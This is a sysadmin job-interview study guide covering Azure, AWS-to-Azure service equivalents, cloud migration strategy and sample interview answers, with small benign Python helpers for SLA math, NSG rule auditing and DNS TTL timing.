🗂️ Sysadmin Master Interview Reference

Rodolfo "Rudy" Martinez-Contreras · All Roles · Heath Consultants & Beyond
10+ yrs Enterprise IT · Disney · CMS
10 Sections · Print Anytime
🏠 Overview
☁️ Azure
☁️ AWS↔Azure & Migration
⚙️ VMware/VDI
🤖 Automation
🗂️ AD/DNS/DHCP/GPO
🖥️ SysAdmin Core
🔒 Hardening
📧 M365
📱 MDM
💾 Storage & Backups
💬 General Q&A

Your Honesty Map

Azure — Real. ~1yr gap. Review tonight. VMs, Monitor, Backup, CLI, AD Connect.
VMware / Horizon VDI — Deep. 80+ VMs, vMotion, HA, DEM, 500+ VDI sessions.
Active Directory / DNS / DHCP / GPO — Core strength. 2,000+ users, multi-site, daily use.
Automation — PowerShell / Bash — Real, quantified. 85% ops reduction.
Storage — EMC Isilon (NAS), Azure Backup, Dell CloudSnapshot Manager (AWS). Bridge to Rubrik.
Trend Micro Deep Security — Real. 100+ hybrid cloud servers at CMS. Bridges to server security, IDS/IPS, Defender for Cloud, CWPP, HIPAA compliance.
⚠️ M365 — Limited direct admin. Honest bridge: mailbox support, license management, user-level M365. Study section tonight.
⚠️ MDM (Intune/JAMF) — BigFix + Horizon DEM bridge. No direct. Be honest.
⚠️ Rubrik — No direct. Bridge via Dell CSM + Azure Backup + Isilon. Solid domain knowledge.

Resume Numbers — Know Cold

  • 10+ years enterprise IT
  • 8 years Walt Disney Company (multi-site, LA)
  • 80+ VMs VMware at Disney / 3 data centers
  • 100+ servers RHEL + Windows Server
  • 2,000+ AD users at CMS
  • 500+ concurrent Horizon VDI sessions
  • 85% manual ops reduction via scripting
  • 3 EMC Isilon NAS clusters (Disney)
  • 12 streaming TV stations — 24/7 uptime
  • B.S. IT Management — WGU
  • Security+ in progress · Azure certs next
  • Bilingual English / Spanish · Houston 77012

Hybrid Infra — Mental Model

Layer | On-Prem | Cloud (Azure)
Compute | ESXi, physical servers | Azure VMs, Scale Sets
Identity | AD, Domain Controllers | Entra ID, AD Connect
Storage | NAS, SAN, local | Blob, Files, Managed Disks
Network | VLANs, DNS/DHCP servers | VNet, NSG, Azure DNS
Backup | Rubrik appliance, tape | Rubrik archive, Azure Backup
Mgmt | vCenter, RSAT, RDP | Azure Portal, Monitor
💡 For every topic: think on-prem AND cloud version. That's hybrid fluency.
✅ Real experience — ~1yr gap. Read this like a refresher course. The concepts are still in your hands.

Keywords

  • Subscription · Resource Group · RBAC · Azure Portal · Azure CLI · Az PowerShell
  • Azure VMs · VM Scale Sets · Availability Sets · Availability Zones · Managed Disks · Premium SSD
  • VNet · Subnet · NSG · Azure Bastion · VPN Gateway · ExpressRoute · VNet Peering · Private Endpoint
  • Azure AD / Entra ID · Azure AD Connect · Conditional Access · MFA · PIM · SSPR
  • Azure Monitor · Log Analytics · Alert Rules · Action Groups · VM Insights
  • Recovery Services Vault · Azure Backup · ASR · Soft Delete · Instant Restore
  • Blob Storage · Storage Account · Azure Files · Hot/Cool/Archive · LRS/GRS/ZRS
  • Tags · Cost Management · Azure Policy · Defender for Cloud

Azure Organization & Access Control

Level | What it is | Example
Management Group | Container for subscriptions; enterprise governance | "All Production Subs"
Subscription | Billing unit. Separate Dev/Prod/Test subscriptions are common. | "Heath-Production"
Resource Group | Logical container: deploy, manage, and delete resources together. | "RG-WebServers-Prod"
Resource | Actual thing: VM, NIC, disk, NSG, VNet… | "VM-App01"

RBAC Built-In Roles

Owner | Full control, plus assigning access to others
Contributor | Create/manage resources; cannot assign roles
Reader | View only, no changes
Virtual Machine Contributor | Manage VMs, but not the VNet or storage account they connect to

Compute — VMs, Sizing, Availability

VM Series

Series | Optimized For | Use Case
B-series | Burstable | Dev/test, light workloads
D-series | General purpose | Most production, web/app servers
E-series | Memory optimized | Databases, caching, SAP
F-series | Compute optimized | Batch, game servers
N-series | GPU | ML, rendering

Availability

Option | Protects Against | SLA
Availability Set | Rack/hardware failure in one datacenter (fault + update domains) | 99.95%
Availability Zones | Entire datacenter outage; VMs in physically separate buildings | 99.99%
Single VM + Premium SSD | Basic hardware redundancy | 99.9%
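To make the SLA column concrete in an interview, it helps to translate each percentage into allowed downtime. The sketch below is plain arithmetic on the three figures from the table; the function name and the 8,760-hour year are illustrative assumptions, not anything Azure publishes in this form.

```python
# Convert an availability SLA percentage into the downtime it permits.
HOURS_PER_YEAR = 365 * 24  # 8,760 hours, ignoring leap years (assumption)


def allowed_downtime_hours(sla_percent: float, period_hours: float = HOURS_PER_YEAR) -> float:
    """Return the hours of downtime an SLA allows over the given period."""
    return period_hours * (1 - sla_percent / 100)


if __name__ == "__main__":
    options = [
        ("Single VM + Premium SSD", 99.9),
        ("Availability Set", 99.95),
        ("Availability Zones", 99.99),
    ]
    for label, sla in options:
        print(f"{label}: {sla}% allows about {allowed_downtime_hours(sla):.2f} h/year")
```

Roughly: 99.9% is under nine hours a year, 99.95% is about half that, and 99.99% is under one hour.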

Disk Types

Disk | Use Case | IOPS
Standard HDD | Dev/test | Low
Standard SSD | Light web servers | Medium
Premium SSD | Production, databases. Required on all disks for the 99.9% single-VM SLA | High
Ultra Disk | SAP HANA, highest-performance DBs | Configurable, up to hundreds of thousands per disk

Networking

Component | What it does | Key fact
VNet | Private IP network in Azure. VMs live in subnets inside VNets. | VMs in same VNet can talk by default
NSG | Stateful firewall rules: allow/deny by port, protocol, IP range | Applied to subnet OR NIC. Subnet NSG = all VMs in subnet
Azure Bastion | Managed RDP/SSH from browser. No public IP on VM needed. | Best practice: never open 3389 to internet
VNet Peering | Connect two VNets privately over the Microsoft backbone, no internet. | Not transitive: A↔B, B↔C ≠ A↔C
VPN Gateway | On-prem to Azure over encrypted tunnel (public internet) | Lower cost, higher latency than ExpressRoute
ExpressRoute | Dedicated private circuit from on-prem to Azure. No internet. | Higher cost, lower latency, more reliable
Private Endpoint | Azure service (Blob, SQL) accessed via private IP in your VNet | Traffic never leaves Microsoft network
🔒 Never open RDP 3389 or SSH 22 to 0.0.0.0/0 in an NSG. Use Bastion or source-restrict to known IPs. Flag this proactively in any interview — it signals security maturity.
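The rule above can be checked mechanically. This is a minimal sketch that flags inbound allow rules exposing 22 or 3389 to any source. The rule dictionaries are a simplified, hypothetical shape (not the Azure API schema), and the check ignores rule priority, so a higher-priority deny rule would not be taken into account.

```python
from ipaddress import ip_network

MGMT_PORTS = (22, 3389)  # SSH and RDP
ANY_SOURCES = {"*", "Any", "Internet", "0.0.0.0/0"}


def is_open_to_internet(source: str) -> bool:
    """True if the source matches every address (wildcard or a /0 prefix)."""
    if source in ANY_SOURCES:
        return True
    try:
        return ip_network(source, strict=False).prefixlen == 0
    except ValueError:
        return False  # a tag or name we do not recognize as "any"


def port_in_spec(port: int, spec: str) -> bool:
    """Spec is '*', a single port such as '3389', or a range such as '3000-4000'."""
    if spec == "*":
        return True
    low, _, high = spec.partition("-")
    return int(low) <= port <= int(high or low)


def risky_rules(rules):
    """Return (rule name, exposed ports) for inbound allow rules open to the internet."""
    flagged = []
    for rule in rules:
        if rule["direction"] != "Inbound" or rule["access"] != "Allow":
            continue
        if not is_open_to_internet(rule["source"]):
            continue
        exposed = [p for p in MGMT_PORTS if port_in_spec(p, rule["port"])]
        if exposed:
            flagged.append((rule["name"], exposed))
    return flagged
```

Passing a list of rules returns only the ones worth raising, which is the same review you would do by eye in the portal.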

Identity — Hybrid (Azure AD Connect)

Aspect | On-Prem AD | Azure AD / Entra ID
Protocol | Kerberos, LDAP, NTLM | OAuth 2.0, SAML, OpenID Connect
Structure | OUs, GPOs, Sites & Services | Flat; uses Conditional Access + Intune for policy
Auth | Domain Controller validates Kerberos tickets | Cloud token-based, supports passwordless

Azure AD Connect Sync Modes

  • Password Hash Sync (PHS) — Hashed passwords synced to Azure AD. Cloud auth without hitting on-prem DC. Most common.
  • Pass-Through Auth (PTA) — Validation happens on-prem in real time. No hashes stored in cloud.
  • Force sync: Start-ADSyncSyncCycle -PolicyType Delta

Key Identity Features

Conditional Access | Policy engine: IF (user/location/device) THEN (allow / block / require MFA). Example: "Outside corp network = force MFA."
PIM | Privileged Identity Management: just-in-time admin elevation. Request access, get approved, expires automatically. Reduces standing admin exposure.
SSPR | Self-Service Password Reset: users reset their own passwords. Saves helpdesk tickets.
Managed Identity | Azure resource authenticates to other Azure services without stored credentials. Best practice for app-to-service auth.
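The IF/THEN shape of Conditional Access is easy to picture as a small decision function. The sketch below is a toy model only: the SignIn fields and the device-compliance rule are hypothetical illustrations, and the only policy taken from the notes above is "outside corp network = force MFA". Real policies are configured in Entra ID, not written as code.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class SignIn:
    user: str
    on_corp_network: bool
    device_compliant: bool
    mfa_completed: bool


def evaluate(sign_in: SignIn) -> str:
    """Return 'block', 'require_mfa', or 'allow' for a sign-in attempt."""
    # Hypothetical policy: a non-compliant device is blocked outright.
    if not sign_in.device_compliant:
        return "block"
    # Policy from the notes: outside the corporate network, MFA is required.
    if not sign_in.on_corp_network and not sign_in.mfa_completed:
        return "require_mfa"
    return "allow"


if __name__ == "__main__":
    remote = SignIn("rudy", on_corp_network=False, device_compliant=True, mfa_completed=False)
    print(evaluate(remote))
```

The point to carry into an answer is the ordering: conditions are evaluated on signals (who, where, what device), and the most restrictive matching control wins.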

Azure Monitor & Backup

Monitor Stack

  • Metrics — numerical time-series (CPU %, disk bytes/sec). Auto-collected. 93-day default retention.
  • Logs / Log Analytics Workspace — structured events sent here. Query with KQL. Includes activity log, diagnostic logs, VM agent logs.
  • Alert Rules — trigger on metric threshold or log query. Connected to Action Groups (email, SMS, webhook, ITSM).
  • VM Insights — pre-built VM performance dashboards, dependency mapping. Requires Azure Monitor Agent.
  • Diagnostic Settings — configure what a resource sends to Log Analytics, Storage Account, or Event Hub.

Azure Backup

  • Recovery Services Vault — container that holds backup data and policies. Region-specific.
  • Backup Policy — frequency (daily/weekly) + tiered retention (daily 30d, weekly 12wk, monthly 6mo, yearly 2yr).
  • Application-consistent — uses VSS (Windows) / pre-post scripts (Linux) to flush writes before snapshot.
  • Instant Restore — restore from recent local snapshot (fast) vs. vault restore (covers older points, slower).
  • Soft Delete — deleted backup data retained 14 extra days. Ransomware/accidental deletion protection.
  • Azure Site Recovery (ASR) — continuous VM replication to secondary region for DR failover. Different from Backup — ASR = replication, Backup = point-in-time restore.
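The tiered retention example in the Backup Policy bullet (daily 30d, weekly 12wk, monthly 6mo, yearly 2yr) can be turned into expiry dates with simple date arithmetic. This sketch assumes a month is 30 days and a year is 365 days for simplicity; the names are illustrative and this is not how the vault computes retention internally.

```python
from datetime import date, timedelta

# Retention per tier in days (month = 30 days, year = 365 days: simplifying assumptions).
RETENTION_DAYS = {
    "daily": 30,
    "weekly": 12 * 7,
    "monthly": 6 * 30,
    "yearly": 2 * 365,
}


def expires_on(taken: date, tier: str) -> date:
    """Date after which a recovery point of this tier is no longer kept."""
    return taken + timedelta(days=RETENTION_DAYS[tier])


def is_retained(taken: date, tier: str, today: date) -> bool:
    """True if a recovery point taken on 'taken' is still available on 'today'."""
    return today <= expires_on(taken, tier)


if __name__ == "__main__":
    taken = date(2024, 1, 1)
    for tier in RETENTION_DAYS:
        print(f"{tier}: kept until {expires_on(taken, tier)}")
```

This is the reasoning behind a restore drill: before promising a restore from a given date, check which tier, if any, still holds a point from that date.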

Interview Q&A — Azure

Walk me through your Azure experience.
At CMS I provisioned and managed Azure VMs end to end: sizing, patching, lifecycle, and decommission. I configured Azure Monitor alert rules tied to action groups for CPU, memory, and disk thresholds. On backup I set up Recovery Services Vaults with tiered retention policies and ran restore drills to verify backups were actually usable. I scripted a lot via Azure CLI and the PowerShell Az module: bulk VM management, patching workflows, cost reporting on deallocated resources. That was about a year ago, so I've been refreshing the details, but the hands-on instinct is there.
How do you secure Azure VM access?
Azure Bastion is the right answer — RDP/SSH from the browser, no public IP on the VM. NSGs lock down traffic at the subnet and NIC level. I treat opening RDP 3389 to 0.0.0.0/0 as a hard no in any production environment — that's how you end up on a breach report. If Bastion isn't available, the alternative is a VPN or a source-restricted jump host.
Availability Sets vs Availability Zones?
Availability Sets spread VMs across fault and update domains within a single datacenter — protects against hardware rack failures and rolling reboots during maintenance. You get 99.95% SLA. Availability Zones put VMs in physically separate buildings within the same region — protects against entire datacenter outage. 99.99% SLA. For critical production workloads in a region that supports Zones, that's the stronger choice.

AWS vs Azure — Service Name Comparison (Use Your AWS Knowledge)

You know AWS naming. Here's how everything maps so you can translate instantly in an interview.

Compute

AWS | Azure Equivalent | What it does
EC2 | Azure Virtual Machines | IaaS virtual servers. You manage OS up. Same concept: pick size, OS, attach storage, configure networking.
EC2 Auto Scaling Group | VM Scale Sets (VMSS) | Auto-scale VMs based on load rules. Min/max/desired counts.
Lambda | Azure Functions | Serverless: run code without managing servers. Event-triggered, pay per execution.
ECS / EKS | Azure Container Instances / AKS | Run containers. AKS = managed Kubernetes. ACI = single containers without orchestration.
Elastic Beanstalk | Azure App Service | PaaS for web apps. Deploy code, platform manages runtime, scaling, patching.
AMI (Amazon Machine Image) | Azure VM Image / Shared Image Gallery (now Azure Compute Gallery) | Pre-configured OS image used to launch VMs. Azure equivalent = custom VM image captured via Sysprep + generalize.
Spot Instance | Azure Spot VM | Discounted unused capacity that can be evicted on short notice (about 2 minutes on AWS, about 30 seconds on Azure). Dev/test, batch jobs.
Reserved Instance (RI) | Azure Reserved VM Instance | 1 or 3 year commitment for significant discount vs pay-as-you-go. Same VM, lower cost.

Storage

AWS | Azure Equivalent | What it does
S3 | Azure Blob Storage | Object storage. HTTP API. Buckets → Containers. Keys → Blob names. You used S3 at CMS: same thing.
S3 Storage Classes (Standard / IA / Glacier) | Blob Tiers (Hot / Cool / Archive) | Tiered storage by access frequency. Glacier ≈ Archive tier: cheap, slow retrieval (hours).
EBS (Elastic Block Store) | Azure Managed Disks | Block storage attached to VMs. Types map roughly: gp3 ≈ Premium SSD, io2 ≈ Ultra Disk.
EFS (Elastic File System) | Azure Files | Managed file share, mountable from multiple VMs simultaneously. EFS is NFS; Azure Files offers SMB and NFS. Shared storage.
S3 Glacier | Azure Blob Archive tier | Cheapest long-term archive. Retrieval takes hours. Both used for compliance/DR archival.
AWS Backup | Azure Backup | Centralized backup service for cloud resources. Policies, retention, vaults. You used Dell CSM on top of AWS; Azure Backup is native.
Storage Gateway | Azure File Sync / StorSimple | Hybrid on-prem to cloud storage bridge. Cache frequently used files on-prem, tier cold data to cloud. StorSimple has since been retired, so Azure File Sync is the current option.

Networking

AWS | Azure Equivalent | Notes
VPC | VNet (Virtual Network) | Private network in the cloud. VPC = VNet. Subnets work the same way in both.
Security Group | NSG (Network Security Group) | Stateful firewall rules. AWS SG applies at instance level. Azure NSG applies at subnet or NIC level.
NACL (Network ACL) | NSG (subnet-level) | Stateless ACL in AWS. Azure NSG is stateful but applied at subnet scope, so it is the closest equivalent.
Internet Gateway | Azure Internet (built in) | VNet subnets with public IPs have outbound internet by default. No separate gateway resource needed like AWS IGW.
NAT Gateway | Azure NAT Gateway | Outbound internet for private subnets. Same concept, same name.
VPC Peering | VNet Peering | Connect two VPCs/VNets privately. Neither is transitive: A↔B, B↔C does NOT give A↔C.
Transit Gateway | Azure Virtual WAN / Route Server | Hub-and-spoke networking: connect many VPCs/VNets centrally. Transit Gateway is more mature in AWS currently.
Direct Connect | ExpressRoute | Dedicated private circuit from on-prem to cloud. Not over internet. Lower latency, more reliable, more expensive.
Site-to-Site VPN | VPN Gateway (Site-to-Site) | IPsec VPN over public internet from on-prem to cloud. Lower cost, higher latency than Direct Connect/ExpressRoute.
Route 53 | Azure DNS | DNS hosting. Route 53 also does health checks and traffic routing (latency-based, failover); Azure Traffic Manager handles that separately.
ELB / ALB / NLB | Azure Load Balancer / App Gateway | NLB ≈ Azure Load Balancer (L4). ALB ≈ Azure Application Gateway (L7: HTTP/HTTPS, WAF). Azure Front Door = global L7 + CDN + WAF.
CloudFront | Azure CDN / Azure Front Door | CDN: cache content globally close to users. Front Door adds routing and WAF on top.
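The non-transitive peering row in the table above is a common interview trap, so here is a small model of it. The network names and helper functions are hypothetical; the only rule encoded is that two networks can talk only when they are directly peered.

```python
from itertools import combinations


def can_reach(peerings, a, b):
    """Peering is not transitive: traffic flows only over a direct peering."""
    return a == b or frozenset((a, b)) in peerings


def missing_peerings(networks, peerings):
    """Pairs that would still need their own peering for full connectivity."""
    return [
        (a, b)
        for a, b in combinations(sorted(networks), 2)
        if frozenset((a, b)) not in peerings
    ]


if __name__ == "__main__":
    peerings = {frozenset(("A", "B")), frozenset(("B", "C"))}
    print(can_reach(peerings, "A", "B"))  # directly peered
    print(can_reach(peerings, "A", "C"))  # only connected through B
    print(missing_peerings(["A", "B", "C"], peerings))
```

The number of missing pairs grows quickly as networks are added, which is the practical argument for the hub-and-spoke options (Transit Gateway, Virtual WAN) listed in the same table.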

Identity & Security

AWS | Azure Equivalent | Notes
IAM | Azure RBAC + Entra ID | Access control. AWS IAM = users, roles, policies. Azure splits it: Entra ID for identity, RBAC for resource permissions. More granular in Azure at resource level.
IAM Role (EC2 instance role) | Managed Identity | Lets a VM/service authenticate to other cloud services without storing credentials in code or config.
AWS Organizations / SCPs | Azure Management Groups + Azure Policy | Govern multiple accounts/subscriptions. Enforce policy at org level. SCPs ≈ Azure Policy deny effects.
AWS SSO / IAM Identity Center | Entra ID (Azure AD) + Conditional Access | SSO and access governance. Azure Conditional Access is more tightly integrated with device compliance and risk signals.
AWS Secrets Manager | Azure Key Vault | Store and rotate secrets, passwords, API keys, TLS certificates. Managed Identity grants services access to Key Vault without credentials.
AWS KMS | Azure Key Vault (keys) | Encryption key management. Customer-managed keys for encrypting storage, disks, databases.
AWS Shield / WAF | Azure DDoS Protection / Azure WAF | DDoS mitigation and web application firewall. WAF in Azure runs on App Gateway or Front Door.
GuardDuty | Microsoft Defender for Cloud | Threat detection across cloud resources. Analyzes logs and signals for malicious activity, misconfigurations.
AWS Config | Azure Policy + Defender for Cloud | Compliance posture: are your resources configured correctly? Enforces rules and reports drift.

Monitoring & Management

AWS | Azure Equivalent | Notes
CloudWatch Metrics | Azure Monitor Metrics | Time-series numeric data from resources. CPU, network, disk. Both auto-collected. Set alarms/alerts on thresholds.
CloudWatch Logs | Log Analytics Workspace | Centralized log store. CloudWatch Logs Insights (query) ≈ KQL in Log Analytics. Both aggregate logs from many sources.
CloudWatch Alarms | Azure Monitor Alert Rules + Action Groups | Alert on metric/log condition → notify (email, SMS, webhook, PagerDuty). Action Groups = SNS Topics in AWS.
CloudTrail | Azure Activity Log | API-level audit trail: who did what to which resource and when. Critical for security forensics.
AWS Systems Manager (SSM) | Azure Arc + Azure Automation | Manage servers (cloud and on-prem) remotely. Run scripts, patch, inventory without opening inbound ports. SSM Session Manager ≈ Azure Bastion for SSH/RDP.
AWS Cost Explorer | Azure Cost Management + Billing | Analyze spend by service, tag, time period. Set budgets and alerts. Both support reserved instance recommendations.
AWS Trusted Advisor | Azure Advisor | Best practice recommendations: cost optimization, security, reliability, performance. Flags unused resources, open security groups, etc.
CloudFormation | ARM Templates / Bicep | Infrastructure as Code. Define resources in JSON/YAML (CFN) or JSON/Bicep (ARM). Both declarative: define desired state, cloud figures out how to get there. Terraform works on both.

Database & Other Services

AWS | Azure Equivalent | Notes
RDS | Azure SQL Database / Azure Database for MySQL/PostgreSQL | Managed relational databases. RDS SQL Server ≈ Azure SQL Database. Same concept: managed engine, you handle schema/data.
DynamoDB | Azure Cosmos DB | Managed NoSQL. Both globally distributed, low latency, serverless options. Different data models (DynamoDB = key-value/doc, Cosmos = multi-model).
ElastiCache | Azure Cache for Redis | Managed in-memory caching for app performance. ElastiCache offers Redis or Memcached; Azure Cache for Redis is Redis only.
SQS | Azure Service Bus / Storage Queues | Message queuing to decouple app components. SQS ≈ Storage Queues (simple). SNS+SQS fan-out ≈ Service Bus Topics.
SNS | Azure Event Grid / Service Bus | Pub/sub messaging. Event Grid = event routing. Service Bus = enterprise messaging with queues and topics.
💡 Key mindset shift — AWS → Azure: AWS tends to have more granular, single-purpose services. Azure tends to bundle more into fewer services (e.g., NSG handles what AWS splits between Security Groups + NACLs). Naming in Azure is more descriptive (Virtual Machine vs EC2, Virtual Network vs VPC). The concepts are identical — your AWS experience translates directly. Lead with "I know the AWS equivalent as X — in Azure that's Y."

On-Premises to Cloud Migration — Full Knowledge Base

The 6 R's of Cloud Migration (Industry Framework)

Every migration strategy falls into one of these. Know them — interviewers love this.

Strategy | Also called | What it means | When to use
Rehost | "Lift and Shift" | Move the VM/server as-is to the cloud. No changes to the app or OS. Fastest migration path. | Legacy apps you can't modify, tight migration deadlines, first wave of a large migration
Replatform | "Lift, Tinker, and Shift" | Minor optimizations without changing core architecture. Example: move on-prem MySQL → Azure Database for MySQL (managed). App stays the same, engine is now managed. | Get managed service benefits without full refactor. DB maintenance, patching, backups handled for you.
Refactor / Re-architect | "Re-architect" | Redesign the application to be cloud-native. Break monolith into microservices, adopt containers, serverless, etc. Highest value, highest effort. | Apps that need to scale dynamically, modernization initiatives, long-term investment
Repurchase | "Drop and Shop" | Replace on-prem software with a cloud SaaS equivalent. Example: on-prem Exchange → Exchange Online (M365). On-prem CRM → Salesforce. | When the SaaS alternative is better and cheaper than maintaining on-prem
Retire | Decommission | Identify apps/servers that are no longer needed. Turn them off. Saves money, reduces attack surface. | During discovery; typically 10–30% of workloads can be retired
Retain | "Revisit" | Keep it on-prem for now. Not ready to migrate: compliance, latency, dependency, or cost doesn't justify it yet. | Mainframes, apps with specialized hardware, regulatory requirements, recently upgraded systems
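One way to rehearse the table is to walk a workload through the questions in a fixed order. The sketch below is a hypothetical triage helper: the dictionary keys and the order of the checks are assumptions made for illustration, not an industry-standard algorithm, and real decisions weigh cost and risk that a few flags cannot capture.

```python
def choose_strategy(workload: dict) -> str:
    """Pick one of the 6 R's from a few yes/no facts about a workload."""
    if not workload.get("in_use", True):
        return "Retire"        # nobody uses it: turn it off
    if workload.get("must_stay_on_prem", False):
        return "Retain"        # compliance, special hardware, recent upgrade
    if workload.get("saas_replacement_available", False):
        return "Repurchase"    # e.g. on-prem Exchange to Exchange Online
    if workload.get("needs_dynamic_scaling", False):
        return "Refactor"      # redesign as cloud-native
    if workload.get("managed_service_available", False):
        return "Replatform"    # e.g. MySQL on a VM to a managed database
    return "Rehost"            # default: lift and shift


if __name__ == "__main__":
    print(choose_strategy({"in_use": False}))
    print(choose_strategy({"managed_service_available": True}))
    print(choose_strategy({}))
```

Rehost is the fallback here because the table describes it as the fastest path when nothing else applies.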

Migration Phases — Step by Step

1. Discover & Assess
  Steps:
  • Inventory all servers, apps, dependencies.
  • Identify what talks to what (dependency mapping).
  • Classify by criticality and migration strategy (6 R's).
  • Estimate cloud costs.
  Tools / Notes:
  • AWS: Migration Evaluator, Application Discovery Service
  • Azure: Azure Migrate (free), Movere
  • Both: Cloudamize, Risc Networks, manual CMDB

2. Plan & Design
  Steps:
  • Define migration waves (which workloads move together).
  • Design target architecture (VNet layout, subnets, NSGs).
  • Plan identity (AD Connect, hybrid auth).
  • Set up landing zone (subscriptions, networking, IAM baseline).
  • Establish naming conventions and tagging strategy.
  • Define rollback plan for each wave.
  Tools / Notes:
  • Azure Landing Zone (Microsoft CAF framework)
  • Azure Blueprints: deploy governance guardrails
  • Draw.io, Visio for architecture diagrams

3. Pilot Migration
  Steps:
  • Migrate 1–3 non-critical workloads first.
  • Test the migration tooling end to end.
  • Validate networking, DNS, authentication.
  • Document what broke and fix the process.
  Tools / Notes:
  • Run a full cycle: migrate → test → roll back → migrate again. Build confidence before touching critical systems.

4. Migrate
  Steps:
  • Execute in waves by dependency group.
  • For each workload: replicate → test → cut over → validate → decommission old.
  • Keep on-prem running in parallel until validation passes.
  • Update DNS after cutover.
  • Notify stakeholders of maintenance windows.
  Tools / Notes:
  • Azure: Azure Site Recovery (ASR) for lift-and-shift VMs
  • Azure Database Migration Service for databases
  • Storage Migration Service for file servers
  • AWS: AWS Server Migration Service, CloudEndure (both since superseded by AWS Application Migration Service)

5. Optimize & Operate
  Steps:
  • Right-size VMs based on actual utilization.
  • Set up monitoring, alerting, backup policies.
  • Apply Reserved Instances for stable workloads.
  • Clean up: decommission on-prem hardware.
  • Set up FinOps for ongoing cost governance.
  Tools / Notes:
  • Azure Advisor, Cost Management, Defender for Cloud. This phase never ends; cloud optimization is continuous.

Azure Migrate — Key Tool

Azure Migrate Hub | Free central tool for discovery, assessment, and migration. Brings together multiple tools under one portal. Start here for any Azure migration.
Discovery & Assessment | Deploy a lightweight appliance VM on-prem. It discovers VMs, servers, SQL instances, web apps. Collects performance data for 30 days. Output: sizing recommendations and cost estimates for Azure.
Server Migration (via ASR) | Replicates on-prem VMs to Azure continuously. When ready, trigger a test failover (non-disruptive), then a final cutover. Minimal downtime. Supports VMware, Hyper-V, and physical servers.
Database Migration Service | Migrate SQL Server, MySQL, PostgreSQL to Azure managed database services. Online migration = near-zero downtime using CDC (Change Data Capture) to keep source and target in sync until cutover.

Hybrid Identity — Migration Consideration

  • Before migration: Set up Azure AD Connect to sync on-prem AD to Azure AD. Users get the same credentials for cloud resources.
  • DNS cutover is critical: When you migrate a workload, update DNS to point to the new Azure IP. Do this last, after the VM is validated in Azure. Lower the TTL on the affected DNS records ahead of the migration so the change propagates fast.
  • Firewall rules: On-prem firewalls may need rules for Azure VNet subnets if hybrid connectivity exists. Plan this before migration day.
  • License mobility: Existing Windows Server and SQL Server licenses may be usable in Azure (Azure Hybrid Benefit) — significant cost savings. Always check before buying new Azure licenses.

Migration Risks & Mitigations

Risk | Mitigation
Undiscovered dependencies (app calls a server nobody knew about) | Run dependency mapping tools for 2–4 weeks before migration. Use network flow analysis. Never skip discovery.
DNS propagation delays during cutover | Lower TTL to 60 seconds 48hrs before cutover. After migration, TTL can be raised again.
Performance worse in cloud than on-prem | Right-size based on performance data (not just current VM size). On-prem VMs are often overprovisioned. Profile before and after.
Cost higher than estimated | Use Reserved Instances, right-size aggressively, implement auto-shutdown for dev/test, use Blob lifecycle policies.
Data not fully replicated at cutover | Verify replication lag is zero before triggering cutover. Run validation queries on both sides for databases.
Rollback needed mid-migration | Keep on-prem running until sign-off. Have a documented rollback runbook with DNS revert steps before every migration window.
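The DNS mitigation in the table works because resolvers may keep serving a cached record for as long as the old TTL. So the TTL has to be lowered at least one old-TTL period before cutover, and the 48-hour lead is a safety margin on top. A minimal sketch of that timing, with hypothetical function names and example dates:

```python
from datetime import datetime, timedelta


def latest_ttl_change(cutover: datetime, old_ttl_seconds: int,
                      lead: timedelta = timedelta(hours=48)) -> datetime:
    """Latest moment to lower the TTL so every cache holds the short TTL by cutover.

    Uses whichever is longer: the 48-hour lead from the notes or the old TTL itself.
    """
    return cutover - max(lead, timedelta(seconds=old_ttl_seconds))


def worst_case_stale_seconds(ttl_seconds: int) -> int:
    """After the record changes, a resolver can serve the old answer for up to one TTL."""
    return ttl_seconds


if __name__ == "__main__":
    cutover = datetime(2025, 6, 14, 22, 0)
    print(latest_ttl_change(cutover, old_ttl_seconds=86400))   # 1-day TTL
    print(latest_ttl_change(cutover, old_ttl_seconds=604800))  # 7-day TTL
    print(worst_case_stale_seconds(60))
```

With a 60-second TTL in place, clients follow the new Azure IP within about a minute, and a rollback is just as fast.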

Interview Q&A — Migration

Walk me through how you'd migrate an on-prem VM to Azure.
Start by assessing the workload with Azure Migrate — get sizing recommendations based on actual performance data, not just current specs. Design the target: which VNet and subnet, NSG rules, which availability option. Set up Azure AD Connect if not already done for hybrid identity. Then use Azure Site Recovery to replicate the VM — it replicates continuously to Azure while the on-prem VM is still live. When ready, trigger a test failover to validate the VM comes up clean in Azure, check app functionality, check connectivity. Then schedule the cutover window: final sync, DNS update pointing to the Azure private/public IP, validate, and notify stakeholders it's complete. Keep the on-prem VM off but not deleted for at least two weeks as a rollback option.
What are the 6 R's of cloud migration?
Rehost — lift and shift as-is, fastest. Replatform — minor optimizations like moving to a managed database service. Refactor — redesign for cloud-native, highest value, highest effort. Repurchase — replace on-prem software with SaaS equivalent, like moving Exchange to M365. Retire — decommission apps that are no longer needed, typically 10–30% of a portfolio. Retain — keep on-prem for now, not ready or not worth moving yet. In practice, most migrations are a mix — the first wave is mostly rehost for speed, then you revisit and replatform or refactor where the ROI justifies it.
What's the biggest risk in a cloud migration and how do you handle it?
Undiscovered dependencies are what kill migrations. An app calls a database nobody mapped, or a service relies on a hardcoded on-prem IP, and you don't find out until cutover day. The mitigation is running dependency mapping and network flow analysis for several weeks before planning the migration; tools like Azure Migrate's discovery appliance will surface most of this. The second risk is assuming rollback is easy. You always need a documented rollback runbook with DNS revert steps written before you start the cutover window, not after something goes wrong.
How do AWS and Azure differ — which is better?
Neither is universally better. They're both mature, enterprise-grade platforms. AWS has been around longer and has a broader service catalog. Azure integrates more tightly with Microsoft products such as Active Directory, M365, and Windows Server licensing (Hybrid Benefit), which makes it the natural choice for organizations already on the Microsoft stack. The core compute, storage, networking, and identity concepts are the same between them. My hands-on background has been primarily Azure at CMS and AWS with Dell CloudSnapshot Manager, so I'm comfortable translating between them: the underlying concepts are identical, just with different naming conventions.

Migration — Plain English Refresher (ELI10 Version)

🧠 Read this first. Once the plain-English version clicks, the technical terms will stick on their own.

The Big Picture — What Is "Migrating to the Cloud"?

Imagine your company has physical servers sitting in a room — a data center or server closet. Those servers run everything: file shares, databases, websites, Active Directory. You own the hardware. You maintain it. When it breaks, you fix it.

"Migrating to the cloud" means: stop running that stuff on your hardware, and run it on Microsoft's hardware (Azure) instead. You rent compute, storage, and networking from Microsoft. Your software still runs — it just runs somewhere else, and Microsoft owns and maintains the physical machines.

That's it. Everything else is just how you move each piece, and what you decide to do with each app along the way.

The 6 R's — Plain English

When you look at each server or application, you have to decide: what actually happens to it? The industry gave these decisions names:

